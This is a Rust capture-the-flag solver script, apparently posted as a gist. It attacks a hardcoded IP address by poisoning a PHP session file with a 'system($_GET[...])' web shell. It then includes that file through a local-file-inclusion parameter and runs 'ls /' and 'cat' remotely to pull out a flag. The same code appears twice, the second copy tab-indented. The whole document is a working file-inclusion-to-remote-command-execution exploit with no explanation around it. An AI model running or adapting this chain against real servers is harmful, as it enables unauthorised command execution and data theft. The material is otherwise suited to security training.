Aviksaikat/get_flag.rs

## get_flag.rs
extern crate reqwest;
extern crate regex;

use reqwest::Client;
use regex::Regex;

fn send_payload(client: &Client) {
    let url = "http://44.200.237.73/";
    client.get(format!("{}?karma=<?php system($_GET['jadu']); ?>", url).as_str()).send().unwrap();
}

fn payload(cookie: &str, cmd: Option<&str>) -> String {
    if let Some(cmd) = cmd {
        format!("?karma=/tmp/sess_{}&jadu={}", cookie, cmd)
    } else {
        format!("?karma=/tmp/sess_{}", cookie)
    }
}

fn main() {
    let client = Client::new();

    let url = "http://44.200.237.73/";
    let response = client.get(url).send().unwrap();

    let cookie = response.cookies()["PHPSESSID"].value();
    let response = client.get(format!("{}{}", url, payload(&cookie, None)).as_str()).send().unwrap();

    send_payload(&client);

    let response = client.get(format!("{}{}", url, payload(&cookie, Some("ls /"))).as_str()).send().unwrap();

    let file_regex = Regex::new(r"seCretJutsuToKillBorUtoKun.txt").unwrap();
    let file = file_regex.find(&response.text().unwrap()).unwrap().as_str();

    if file.is_empty() {
        println!("Oops something wrong no output found!!");
        return;
    }

    send_payload(&client);

    let response = client.get(format!("{}{}", url, payload(&cookie, Some(format!("cat /{}", file)))).as_str()).send().unwrap();

    let msg = response.text().unwrap().split(":").last().unwrap();
    println!("{}", msg);

    let flag_regex = Regex::new(r"FLAG{.*}").unwrap();
    let flag = flag_regex.find(&msg).unwrap().as_str();

    println!("\nFlag: {}", flag);
}
	extern crate reqwest;
	extern crate regex;

	use reqwest::Client;
	use regex::Regex;

	fn send_payload(client: &Client) {
	let url = "http://44.200.237.73/";
	client.get(format!("{}?karma=<?php system($_GET['jadu']); ?>", url).as_str()).send().unwrap();
	}

	fn payload(cookie: &str, cmd: Option<&str>) -> String {
	if let Some(cmd) = cmd {
	format!("?karma=/tmp/sess_{}&jadu={}", cookie, cmd)
	} else {
	format!("?karma=/tmp/sess_{}", cookie)
	}
	}

	fn main() {
	let client = Client::new();

	let url = "http://44.200.237.73/";
	let response = client.get(url).send().unwrap();

	let cookie = response.cookies()["PHPSESSID"].value();
	let response = client.get(format!("{}{}", url, payload(&cookie, None)).as_str()).send().unwrap();

	send_payload(&client);

	let response = client.get(format!("{}{}", url, payload(&cookie, Some("ls /"))).as_str()).send().unwrap();

	let file_regex = Regex::new(r"seCretJutsuToKillBorUtoKun.txt").unwrap();
	let file = file_regex.find(&response.text().unwrap()).unwrap().as_str();

	if file.is_empty() {
	println!("Oops something wrong no output found!!");
	return;
	}

	send_payload(&client);

	let response = client.get(format!("{}{}", url, payload(&cookie, Some(format!("cat /{}", file)))).as_str()).send().unwrap();

	let msg = response.text().unwrap().split(":").last().unwrap();
	println!("{}", msg);

	let flag_regex = Regex::new(r"FLAG{.*}").unwrap();
	let flag = flag_regex.find(&msg).unwrap().as_str();

	println!("\nFlag: {}", flag);
	}